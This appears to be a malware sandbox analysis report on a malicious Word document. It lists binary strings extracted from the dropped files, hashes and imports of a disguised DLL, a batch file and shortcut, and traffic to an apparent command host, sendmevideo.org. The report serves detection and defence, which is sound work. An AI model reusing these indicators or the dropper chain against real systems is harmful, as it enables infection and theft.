h8:Bw^y5,X1Nh0`}y[eym/JDr8M)K-2}u>>uSj:7"Ff9b]sXvT)@6zKjRz}O\

Ansi based on Dropped File (~WRD0000.tmp)

h['!#EeF+Y-FWmfDPjMZ/}o"X-]=GUMEUoDD74x#@74\!7EUF+?XPU 6+fT=m#7BNPSrvP*R`#8#8#p'YV"UPaxUA!')

Ansi based on Dropped File (~WRD0000.tmp)

i../*,5zXz+ /0,TE^tw7fYEsKwH:EaO||ewV)QKQHzpd#p]y"j^}>)0d^Vwuo?fa>[U`(U}}I+

Ansi based on Dropped File (~WRD0000.tmp)

ig@X6_]7~

Ansi based on Dropped File (~WRD0000.tmp)

J(6-!FnBPFb2y(R1"I2OxfT#L

Ansi based on Dropped File (~WRD0000.tmp)

j.dR?(QxP3'J5$4v~^W=)~-}"!E?~BT5+

Ansi based on Dropped File (~WRD0000.tmp)

j.k#g,yw}*B.KO*/bUg+LO}/,zp 3j@@8*thox9cxpaA3j.p'M18nt}ynTT<91E#z[4E#Gz[4RE#z[4pv

Ansi based on Dropped File (~WRD0000.tmp)

JmoLzc<qhcN2zoa9+T-f6:Gbn~JqT[w<,97zNHs

Ansi based on Dropped File (~WRD0000.tmp)

Jv_uPK!Nword/webSettings.xmlJ1;,"t R"ivvdLjOo ^z$@_f^

Ansi based on Dropped File (~WRD0000.tmp)

K@Nm}/k

Ansi based on Dropped File (~WRD0000.tmp)

KvGDun

Ansi based on Dropped File (~WRD0000.tmp)

LUl\$^U@UO^"9Ac |K`z'r{Wi/}.'26&g\U&|qJvVPK!uwvdocProps/app.xml (RN0#QPPKj

Ansi based on Dropped File (~WRD0000.tmp)

LvVxJO<?d^YZXaTtC@^1M *#Y0^:XtX+Ix!8q{z]!cZPS"*V<m0&-<nj*4=evc,nk

Ansi based on Dropped File (~WRD0000.tmp)

O,CtU$Wq:h2]$}|z%jo4>6]>b>M8M2_f}u=fJ7lkO

Ansi based on Dropped File (~WRD0000.tmp)

PK!$[Content_Types].xml (MO@&Wz0M.C~dgJKZ23J<*kROz,#m,eEDi

Ansi based on Dropped File (~WRD0000.tmp)

PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!_DMt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0

Ansi based on Dropped File (~WRD0000.tmp)

R`parD"[2nCeun`X?x-^XiF'*1L-]3NiK^"C!FNs=g@\o^^h^^h;l/izfNpA{;$8cg]|s);O:SpJMTcaZEobb*y2"_CZ4JNLz4eQizIaL* 42@-^\MCG-&+[WFWmf$PjMZ-sunX-U=FUMt]7 '#8M#p'[VW8?8PU 6jWfT=v&Pj7NxX

Ansi based on Dropped File (~WRD0000.tmp)

s] <"w

Ansi based on Dropped File (~WRD0000.tmp)

TC(9Mj

Ansi based on Dropped File (~WRD0000.tmp)

t{-E;X6?vX&+$Hy'r}}W6]1oXWV:DzHp*\;\)4{wt%n0,vFO9cxY:Y7,N%gwY PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I

Ansi based on Dropped File (~WRD0000.tmp)

uz/l$

Ansi based on Dropped File (~WRD0000.tmp)

v`g/~{_Mc4(i%a)S.Lp)D^i)XKf\m

Ansi based on Dropped File (~WRD0000.tmp)

w".4kj,g6_WyF!#G2>

Ansi based on Dropped File (~WRD0000.tmp)

W=8}L$mNz7"T-ur_(/IuvX?z~6po+Ua/

Ansi based on Dropped File (~WRD0000.tmp)

Z,P6vO[f6C=\f{Ya)7$vj?G(a

Ansi based on Dropped File (~WRD0000.tmp)

zk7^U}p'6XpgE3/,\hv.KDY

Ansi based on Dropped File (~WRD0000.tmp)

zMU=ZNz@*Qba@r"M:y+0Ow2}oIc,XP@&DBAIJqD(

Ansi based on Dropped File (~WRD0000.tmp)

|sJXOI|x"Ef.2%>>2S^Xb)?w.E"drtz]"=Z^Xcf8bm$$<R6g./

Ansi based on Dropped File (~WRD0000.tmp)

~%0uJNGr:E/6|,doJkF`

Ansi based on Dropped File (~WRD0000.tmp)

~xM`ijU <8PU 6o#\vMST';@5:k&017qq.bkx@lypx@lmla(y{%]

Ansi based on Dropped File (~WRD0000.tmp)

~xM`ijU <8PU 6o\vMSTs;@5oex@KA##8M

Ansi based on Dropped File (~WRD0000.tmp)

~xM`ijU <8PU |

Ansi based on Dropped File (~WRD0000.tmp)

.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!=lgtdocProps/core.xml (RN0}7YH$o@e0{V{6}WeTTz=%y|G"5LW0-<

Ansi based on Dropped File (~WRD0002.tmp)

Extracted Files

Displaying 22 extracted file(s). The remaining 8 file(s) are available in the full version and XML/JSON reports.

Informative Selection 2

mvdrt.dll

Download Disabled Extended File Details Hash Seen Before

Size
32KiB (32256 bytes)

Type
pedll executable

Description
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Runtime Process
powershell.exe (PID: 1420)

MD5

1c6f8eba504f2f429abf362626545c79

SHA1

ab354807e687993fbeb1b325eb6e4ab38d428a1e

SHA256

3ac11a74275725a22c233cd974229d2b167c336da667410f7262b4926dabd31b

Extended File Details

mvdrt.dll

Filename: mvdrt.dll
Size: 32KiB (32256 bytes)
Type: pedll executable
Description: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Architecture
: 32 Bit
MD5
: 1c6f8eba504f2f429abf362626545c79
SHA1
: ab354807e687993fbeb1b325eb6e4ab38d428a1e
SHA256
: 3ac11a74275725a22c233cd974229d2b167c336da667410f7262b4926dabd31b
SHA512
: be964e01e589cf6b6ff0ee10930cc555dd15d8accdb5cb09e64c44fb5b3762c7d0c966990fcaef6eb36a837929cc9f786b7b784ff5c5095982be7a76fd5dd1ec
ssdeep
: 384:uKv7cHlUfg4Sw63w2yyCiNVIXnoJvuhvtOkuaEUTyi3eizDCNAGamtA4K8AatAC:uKwmbxziNYokh1O1UTyiJzD19ac
imphash
: 9adb35cc02cc99bca4e0c46cf5de3fc9
authentihash
: 891038c7aef865b1799c3c2961f9cdff0007d9ad7d80f425aaec51bb74c05b88
Compiler/Packer
: Borland Delphi 3.0 (???)

Version Info

LegalCopyright: VirtGroup Company
InternalName: secnt.dll
FileVersion: 3.1.3256.12493
CompanyName: VirtGroup
ProductName: SecureConnector
ProductVersion: 3.1.3256.12493
FileDescription: Secure Connector
OriginalFilename: secnt.dll
Translation: 0x0409 0x04b0

File Sections

Details	Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
Name .text Entropy 6.38371692261 Virtual Address 0x1000 Virtual Size 0x5f18 Raw Size 0x6000 MD5 0760e0c8bd8a2704bf65fb03d6c1cf92	.text	6.38371692261	0x1000	0x5f18	0x6000	0760e0c8bd8a2704bf65fb03d6c1cf92
Name .rdata Entropy 5.52817767618 Virtual Address 0x7000 Virtual Size 0x10ee Raw Size 0x1200 MD5 74cdcb533d7df7e5e5d49ffa2e650c0d	.rdata	5.52817767618	0x7000	0x10ee	0x1200	74cdcb533d7df7e5e5d49ffa2e650c0d
Name .data Entropy 0 Virtual Address 0x9000 Virtual Size 0xf0 Raw Size 0x0 MD5 d41d8cd98f00b204e9800998ecf8427e	.data	0	0x9000	0xf0	0x0	d41d8cd98f00b204e9800998ecf8427e
Name .rsrc Entropy 2.82369600924 Virtual Address 0xa000 Virtual Size 0x340 Raw Size 0x400 MD5 dfc733173e98d9d4bb2ea0136016a07e	.rsrc	2.82369600924	0xa000	0x340	0x400	dfc733173e98d9d4bb2ea0136016a07e
Name .reloc Entropy 6.09472769099 Virtual Address 0xb000 Virtual Size 0x384 Raw Size 0x400 MD5 7933e56fd03e6896d326e718bfd3dfd0	.reloc	6.09472769099	0xb000	0x384	0x400	7933e56fd03e6896d326e718bfd3dfd0

File Imports

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

RegQueryValueExA

RegSetValueExA

CryptBinaryToStringA

CryptStringToBinaryA

GdipAlloc

GdipCloneImage

GdipCreateBitmapFromHBITMAP

GdipDisposeImage

GdipFree

GdipGetImageEncoders

GdipGetImageEncodersSize

GdiplusShutdown

GdiplusStartup

GdipSaveImageToStream

GetAdaptersAddresses

CloseHandle

CreateDirectoryW

CreateFileMappingA

CreateFileW

CreateMutexA

CreateRemoteThread

CreateThread

CreateToolhelp32Snapshot

DeleteFileW

DisableThreadLibraryCalls

FreeLibrary

GetCurrentProcess

GetExitCodeProcess

GetExitCodeThread

GetFileSize

GetLastError

GetModuleHandleA

GetPrivateProfileStringW

GetProcAddress

GetProcessHeap

GetSystemInfo

GetSystemTimeAsFileTime

GetTickCount

GetVersionExA

GetVolumeInformationW

HeapAlloc

HeapFree

HeapReAlloc

IsWow64Process

LoadLibraryA

LoadLibraryW

lstrcmpiA

lstrlenA

lstrlenW

MapViewOfFile

MultiByteToWideChar

OpenFileMappingA

Process32First

Process32Next

QueryPerformanceCounter

ReadFile

SetLastError

Sleep

UnmapViewOfFile

VerifyVersionInfoW

VerSetConditionMask

VirtualAlloc

VirtualFree

WaitForSingleObject

WideCharToMultiByte

WriteFile

SHGetSpecialFolderPathW

DispatchMessageA

GetMessageA

GetSystemMetrics

TranslateMessage

wsprintfA

wsprintfW

HttpOpenRequestA

HttpQueryInfoA

HttpSendRequestA

InternetCloseHandle

InternetConnectA

InternetOpenA

InternetQueryOptionA

InternetReadFile

InternetSetOptionA

gethostbyname

gethostname

WSACleanup

WSAStartup

carved_0.dll

Download Disabled Hash Seen Before

Size
32KiB (32256 bytes)

Type
pedll executable

Description
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Context
sendmevideo.org

MD5

1c6f8eba504f2f429abf362626545c79

SHA1

ab354807e687993fbeb1b325eb6e4ab38d428a1e

SHA256

3ac11a74275725a22c233cd974229d2b167c336da667410f7262b4926dabd31b

Informative 20
- mvdrt.bat
  
  Download Disabled Hash Seen Before
  
  Size
  112B (112 bytes)
  
  Type
  text
  
  Description
  ASCII text, with CRLF line terminators
  
  Runtime Process
  powershell.exe (PID: 1420)
  
  MD5
  
  a3a550cd29ecf1ffa7cf2920f4be543c
  
  SHA1
  
  6ef7de33cb8b34e4b80eebaec49910d389046d3f
  
  SHA256
  
  7ece2a9bb6e4690126ae90bdcd4e02ac05685047c5ba0a011ddcb6f95c3fa6da
- 759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.LNK
  
  Download Disabled Hash Seen Before
  
  Size
  738B (738 bytes)
  
  Type
  lnk
  
  Description
  MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 2 13:08:22 2017, mtime=Thu Nov 2 17:47:17 2017, atime=Thu Nov 2 17:47:18 2017, length=13185, window=hide
  
  Runtime Process
  WINWORD.EXE (PID: 3996)
  
  MD5
  
  be42f09943ce1cc5047e11494247201f
  
  SHA1
  
  fd43a8876ca72e20dc6222fff32eae51630bf922
  
  SHA256
  
  76b6d4f1c82f8aefd737808840edf40354c336e8ba0550c50f51c6c0c10308c5
- ~$Normal.dotm
  
  Download Disabled Hash Seen Before
  
  Size
  162B (162 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3996)
  
  MD5
  
  765c22b82b755fcfcd7ed47b97ae5dae
  
  SHA1
  
  6cba9ef5257dade7d70a6508949cf3c63265802b
  
  SHA256
  
  ede67337c48c9cc5f39d20bfb5a70840730ec19ecd0cc354a8ce63830a3b386e
- index.dat
  
  Download Disabled Hash Seen Before
  
  Size
  250B (250 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3996)
  
  MD5
  
  bb79a624f04623e9501ae7f390bfcf94
  
  SHA1
  
  d3266a25855d8762d359fdc8618bceeeb1029a8e
  
  SHA256
  
  d686c5cb30fba401707e57b7488e941084281baf671c5af31f218f656497eda5
- 4NTW3LFLLHXVE8FQ8F06.temp
  
  Download Disabled Hash Seen Before
  
  Size
  7.8KiB (8016 bytes)
  
  Type
  data
  
  Runtime Process
  powershell.exe (PID: 2460)
  
  MD5
  
  c0f4559960a60a4098068c7b547417d1
  
  SHA1
  
  5e2656c0cbc8237cfbe423a9ebe5b603bf813639
  
  SHA256
  
  7c5b363d9f41bf03600bebac01867e583d449553c527e464c6ea1627175a2a7d
- 6XYB45E3V9BXA69467UK.temp
  
  Download Disabled Hash Seen Before
  
  Size
  7.8KiB (8016 bytes)
  
  Type
  data
  
  Runtime Process
  powershell.exe (PID: 1420)
  
  MD5
  
  c0f4559960a60a4098068c7b547417d1
  
  SHA1
  
  5e2656c0cbc8237cfbe423a9ebe5b603bf813639
  
  SHA256
  
  7c5b363d9f41bf03600bebac01867e583d449553c527e464c6ea1627175a2a7d
- 5Vqlj[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- 9igAhnH[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- IBG0sw[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- Kn[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- TLSMSL[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- VRzZ5.vnd[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- j[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- sNSv.vnd.etsi[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- wY6U6e[1].txt
  
  Download Disabled Hash Seen Before
  
  Size
  69B (69 bytes)
  
  Type
  text
  
  Description
  ASCII text, with no line terminators
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  a0eac91ee2b09b1ec8bcae438fac0fc8
  
  SHA1
  
  e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
  
  SHA256
  
  025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
- ~WRS{3147DD3C-8AE0-4C18-B784-2B1DFD761C56}.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  2.1KiB (2168 bytes)
  
  Type
  unknown
  
  Description
  FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
  
  Runtime Process
  WINWORD.EXE (PID: 3996)
  
  MD5
  
  474297e9e92801128407b7c46517bd71
  
  SHA1
  
  48d8d95d3fc27f54012f6b413037c9819f24722c
  
  SHA256
  
  367b5aa09b488ffa37d65c11941f26da15036f20053a1ff822647dd76c5e33c7
- ~WRS{5FE00026-8FA9-4B7B-B1BA-06FE85B7A820}.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  1KiB (1024 bytes)
  
  Type
  unknown
  
  Description
  FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
  
  Runtime Process
  WINWORD.EXE (PID: 3996)
  
  MD5
  
  5d4d94ee7e06bbb0af9584119797b23a
  
  SHA1
  
  dbb111419c704f116efa8e72471dd83e86e49677
  
  SHA256
  
  4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
- 94308059B57B3142E455B38A6EB92015
  
  Download Disabled Hash Seen Before
  
  Size
  53KiB (53978 bytes)
  
  Type
  data
  
  Description
  Microsoft Cabinet archive data, 53978 bytes, 1 file
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  03f9e1f45c0d5fe8e08af7449ba1fa2f
  
  SHA1
  
  da545c3133a914434cce940bae78d8ad180a529a
  
  SHA256
  
  677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
- Cab7CC9.tmp
  
  Download Disabled Hash Seen Before
  
  Size
  50KiB (50939 bytes)
  
  Type
  data
  
  Description
  Microsoft Cabinet archive data, 50939 bytes, 1 file
  
  Runtime Process
  rundll32.exe (PID: 1968)
  
  MD5
  
  41f958d2d3e9ed4504b6a8863fd72b49
  
  SHA1
  
  f6d380b256b0e66ef347adc78195fd0f228b3e33
  
  SHA256
  
  c929701c67a05f90827563eedccf5eba8e65b2da970189a0371f28cd896708b8
- ~$9fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx
  
  Download Disabled Hash Seen Before
  
  Size
  162B (162 bytes)
  
  Type
  data
  
  Runtime Process
  WINWORD.EXE (PID: 3996)
  
  MD5
  
  765c22b82b755fcfcd7ed47b97ae5dae
  
  SHA1
  
  6cba9ef5257dade7d70a6508949cf3c63265802b
  
  SHA256
  
  ede67337c48c9cc5f39d20bfb5a70840730ec19ecd0cc354a8ce63830a3b386e

Notifications

Runtime

Added comment to Virus Total report

Extracted file "mvdrt.bat" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/7ece2a9bb6e4690126ae90bdcd4e02ac05685047c5ba0a011ddcb6f95c3fa6da/analysis/1509628528/")

Extracted file "mvdrt.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/3ac11a74275725a22c233cd974229d2b167c336da667410f7262b4926dabd31b/analysis/1509628530/")

Extracted file "~$9fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/ede67337c48c9cc5f39d20bfb5a70840730ec19ecd0cc354a8ce63830a3b386e/analysis/1509628529/")

Extracted file "~WRD0000.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/302a673ba0b25c50f374c89c46ba244d3686d510f77578a8d5b0a62ff485a954/analysis/1509628531/")

Extracted file "~WRD0002.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/c05bd7e1c08e0a73a6e203bd0f15f898846abd74f37f586e0e567479872103f1/analysis/1509628532/")

759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx

Incident Response

Risk Assessment

Indicators

Malicious Indicators 10

Suspicious Indicators 15

Informative 21

File Details

759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx

Resources

Visualization

Classification (TrID)

Screenshots

System Resource Monitor

Hybrid Analysis

Network Analysis

DNS Requests

Contacted Hosts

Contacted Countries

HTTP Traffic

Details for GET to 86.106.93.113:80 (sendmevideo.org)

Details for GET to 86.106.93.113:80 (sendmevideo.org)

Suricata Alerts

Extracted Strings

Extracted Files

Informative Selection 2

mvdrt.dll

carved_0.dll

Informative 20

mvdrt.bat

759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.LNK

~$Normal.dotm

Notifications

Runtime

Community

Vetting required

Request Report Deletion

Link